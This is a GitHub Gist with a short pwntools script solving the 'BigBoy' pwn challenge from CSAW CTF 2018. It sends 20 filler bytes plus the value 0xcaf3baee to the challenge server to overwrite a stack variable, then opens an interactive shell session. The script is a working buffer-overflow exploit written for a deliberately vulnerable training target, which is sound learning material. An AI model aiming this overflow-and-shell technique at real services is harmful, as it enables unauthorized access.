Created
September 17, 2018 01:55
-
-
Save faidamine/8a15abdc91bd34f618140944677a3bc3 to your computer and use it in GitHub Desktop.
BigBoy - PWN 25 - CSAW 18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python | |
#Faid Mohammed Amine | |
#Fb : piratuer | |
from pwn import * | |
s = remote("pwn.chal.csaw.io",9000) | |
pld = "A"*20 | |
pld += p32(0xcaf3baee) | |
#s.recvuntil("Are you a big boiiiii??") | |
s.sendline(pld) | |
s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment